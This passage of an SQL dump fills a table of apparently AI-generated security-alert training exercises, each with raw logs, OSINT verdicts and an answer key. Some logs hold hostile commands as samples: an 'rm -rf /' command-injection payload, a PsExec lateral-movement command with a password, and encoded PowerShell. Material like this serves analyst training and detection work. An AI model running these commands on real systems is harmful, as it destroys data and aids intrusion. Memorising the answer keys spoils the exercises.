site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL in the phishing email is confirmed to be used for credential harvesting, indicating a true positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'),
(718, 'False Positive Alert: Unusual Internal Traffic', 'low', 'Firewall', 'Detected unusual traffic patterns between internal hosts. Further analysis indicates this is benign activity related to scheduled maintenance.', 'Network Traffic Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"n/a\",\"hostname\":\"n/a\",\"request_body\":\"n/a\"}', '2026-01-10 22:11:35', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The traffic is consistent with scheduled internal maintenance tasks, confirming a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'),
(719, 'APT29 Lateral Movement Detected via PsExec', 'critical', 'CrowdStrike', 'A potential APT29 operation has been detected using PsExec to move laterally within the network. Internal IP communication suggests compromised credentials.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:14:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.21\",\"dst_ip\":\"10.0.0.34\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\"}', '2026-01-10 01:17:50', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec tool commonly used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage between internal machines indicates possible lateral movement by APT29.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(720, 'Spear-Phishing Email with Malicious URL', 'high', 'Proofpoint', 'An email from a suspicious sender was detected containing a malicious URL likely used for credential harvesting.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:25:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jane.smith\",\"hostname\":\"LAPTOP-04\",\"email_sender\":\"support@secure-mail.com\",\"url\":\"http://malicious-website.com/login\"}', '2026-01-11 06:08:40', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing credential harvest\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used for spoofing legitimate services\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL attempting to mimic legitimate services.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'),
(721, 'Encoded PowerShell Command Execution Detected', 'high', 'Wazuh', 'An encoded PowerShell command was detected on a user machine, indicating possible fileless malware activity.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"michael.brown\",\"hostname\":\"DESKTOP-07\",\"command_line\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\"}', '2026-01-10 07:11:45', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command associated with malware delivery\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware techniques often used by APT groups.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'),
(722, 'False Positive: Anomalous Login Activity', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address. Investigation reveals this is a legitimate user traveling.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"104.28.0.34\",\"dst_ip\":\"10.0.0.12\",\"username\":\"john.doe\",\"hostname\":\"SERVER-02\",\"failed_attempts\":8}', '2026-01-10 00:28:18', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.28.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity, identified as part of legitimate travel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User confirmed to be on business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"User was traveling, resulting in login attempts from an unusual location. No malicious intent detected.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH'),
(723, 'APT41 Spear-Phishing Attack Detected via Malicious Email Link', 'critical', 'Proofpoint', 'A spear-phishing email containing a malicious link was detected targeting a high-level executive. The email was crafted to appear as a legitimate communication from a trusted partner.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-12\",\"email_sender\":\"ceo@trustedpartner.com\",\"url\":\"http://malicious-link.com/verify\",\"subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 09:08:55', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for phishing and spam activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"ceo@trustedpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain detected\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The alert is a true positive as the email contained a malicious link that was confirmed to be part of a phishing campaign.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT'),
(724, 'Lazarus Group Fileless Malware Execution Detected', 'high', 'CrowdStrike', 'A fileless malware was executed using PowerShell obfuscation techniques. The execution was traced back to a known Lazarus Group C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.47\",\"dst_ip\":\"192.168.1.45\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"file_hash\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\"}', '2026-01-10 02:51:53', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscation technique used by APT actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent fileless malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell obfuscation and the link to a known Lazarus C2 server confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(725, 'Cozy Bear Command Injection via Web Request', 'critical', 'Wazuh', 'A command injection attempt was detected via a vulnerable web application endpoint, originating from a Cozy Bear associated IP.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:02:59Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.200\",\"username\":\"webapp\",\"hostname\":\"WEB-SERVER-03\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://victim-site.com/update\"}', '2026-01-11 02:15:21', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple Cozy Bear related attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://victim-site.com/update\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL targeted in previous Cozy Bear campaigns\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The command injection payload and known Cozy Bear IP confirm this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'),
(726, 'False Positive: Legitimate Network Activity Misidentified as Brute Force', 'medium', 'Splunk', 'Multiple login attempts were detected from an internal network IP address. The activity was later confirmed to be a legitimate script testing user access.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:50:12Z\",\"event_type\":\"login_failure\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"192.168.1.30\",\"username\":\"testuser\",\"hostname\":\"AUTH-SERVER\",\"failed_attempts\":15}', '2026-01-10 01:14:37', '2026-01-11 15:08:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for legitimate script execution\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"testuser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Review\",\"verdict\":\"clean\",\"details\":\"User account involved in authorized testing\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The alert was a false positive as the activity was part of a legitimate internal testing process.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS');
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(727, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected attempting to harvest credentials using a malicious URL disguised as an Office365 login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"support@off1ce365-login.com\",\"url\":\"http://off1ce365-login.com/login\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-11 05:36:16', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"support@off1ce365-login.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain registered 3 days ago and associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://off1ce365-login.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting phishing page mimicking Office365 login\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL and a suspicious sender domain indicating a phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT'),
(728, 'Brute Force Attack Detected from Known Malicious IP', 'critical', 'Wazuh', 'Multiple failed login attempts detected from a foreign IP, indicating a brute force attack targeting the internal network.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:32:13Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.10\",\"username\":\"administrator\",\"hostname\":\"server01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":37}', '2026-01-09 18:10:39', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 174 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted in attacks\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network server\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The attack originated from a known malicious IP with multiple failed login attempts, indicating brute force activity.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'),
(729, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A malicious executable was detected running on an endpoint, identified by its known malware hash.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:05:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"\",\"username\":\"jane.doe\",\"hostname\":\"workstation01.examplecorp.com\",\"request_body\":\"\",\"command_line\":\"C:\\\\malicious_folder\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-11 06:28:28', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 63 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious_folder\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable identified as malware with C2 communication\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal workstation IP\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is widely recognized as malicious, and the process execution is anomalous for the user.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'),
(730, 'Suspicious Email Flagged as False Positive', 'medium', 'Email Gateway', 'An email was flagged as suspicious due to a lookalike domain, but the sender is verified as legitimate.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:48:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"10.0.0.5\",\"username\":\"john.smith@examplecorp.com\",\"hostname\":\"mailserver.examplecorp.com\",\"email_sender\":\"billing@examp1ecorp.com\",\"url\":\"http://examp1ecorp.com/invoice\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-01-10 08:48:40', '2026-01-11 15:08:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"billing@examp1ecorp.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified sender; domain used by billing department\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://examp1ecorp.com/invoice\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain resembles legitimate company domain but is legitimate\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal email server IP\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender and domain have been verified as legitimate, marking this as a false positive.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'),
(731, 'Spear Phishing Attempt with Malicious URL Detected', 'high', 'Proofpoint', 'A spear phishing email was detected attempting to lure a user to a malicious website. The email impersonated the CEO and contained a link to a lookalike domain.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:32Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"j.doe@company.com\",\"hostname\":\"workstation-01\",\"email_sender\":\"ceo@company-secure.com\",\"domain\":\"company-secure.com\",\"url\":\"http://secure-company.com/login\"}', '2026-01-11 08:10:28', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in phishing campaigns targeting corporate users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-company.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing attacks impersonating company executives.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a known malicious domain impersonating the CEO, and the URL is flagged as malicious.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(732, 'Credential Harvesting via Office365 Phishing Page', 'critical', 'Email Gateway', 'An email was detected redirecting the user to an Office365 lookalike login page to steal credentials. The domain used was not authorized by the organization.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:42:18Z\",\"event_type\":\"email_received\",\"src_ip\":\"202.54.1.1\",\"dst_ip\":\"10.0.0.12\",\"username\":\"a.smith@company.com\",\"hostname\":\"workstation-02\",\"email_sender\":\"office365@security-alert.com\",\"domain\":\"security-alert.com\",\"url\":\"http://office-login.com/verify\"}', '2026-01-10 11:41:11', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"office365@security-alert.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address involved in phishing attempts targeting Office365 users.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://office-login.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site mimicking Office365 login page.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that leads to a phishing page designed to steal Office365 credentials.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'),
(733, 'Business Email Compromise Attempt via Lookalike Domain', 'medium', 'Proofpoint', 'An email pretending to be from a trusted partner was detected with a request for an urgent transaction. The sender\'s domain closely resembles an official domain but is slightly altered.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"10.0.0.8\",\"username\":\"c.brown@company.com\",\"hostname\":\"workstation-03\",\"email_sender\":\"partner@trusted-secure.com\",\"domain\":\"trusted-secure.com\",\"url\":\"http://secure-trusted.com/transaction\"}', '2026-01-09 17:01:50', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"partner@trusted-secure.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Domain closely resembling a trusted partner, associated with BEC attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://secure-trusted.com/transaction\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL used in BEC scams to redirect users to fraudulent transaction pages.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The sender\'s domain is a lookalike of a trusted partner, used in a BEC attempt to request a fraudulent transaction.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT'),
(734, 'False Positive Alert: Legitimate Email Flagged as Phishing', 'low', 'Email Gateway', 'An email from a new vendor was mistakenly flagged as phishing due to an unusual domain. The email content and sender\'s reputation are verified as legitimate.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:30:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.5\",\"dst_ip\":\"10.0.0.15\",\"username\":\"m.jones@company.com\",\"hostname\":\"workstation-04\",\"email_sender\":\"info@newvendor.com\",\"domain\":\"newvendor.com\",\"url\":\"http://newvendor.com/welcome\"}', '2026-01-11 06:47:17', '2026-01-11 15:09:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"info@newvendor.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"Email address verified as legitimate by OSINT checks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://newvendor.com/welcome\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"URL verified as legitimate, associated with a new vendor.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the recipient\'s workstation.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email from a new vendor was mistakenly flagged due to an unfamiliar domain but verified as legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'),
(735, 'Spear Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A spear phishing email was detected targeting an employee, containing a malicious URL hosted on a lookalike domain. The email uses urgency language to lure the victim into clicking the link.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.10.5\",\"username\":\"jdoe@example.com\",\"hostname\":\"WS-001\",\"email_sender\":\"ceo@examp1e.com\",\"url\":\"http://login.examp1e.com/secure\",\"email_subject\":\"Urgent: Verify Your Account Immediately\"}', '2026-01-11 02:32:22', '2026-01-11 15:09:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@examp1e.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://login.examp1e.com/secure\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing login pages\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 152 times for phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The lookalike domain and 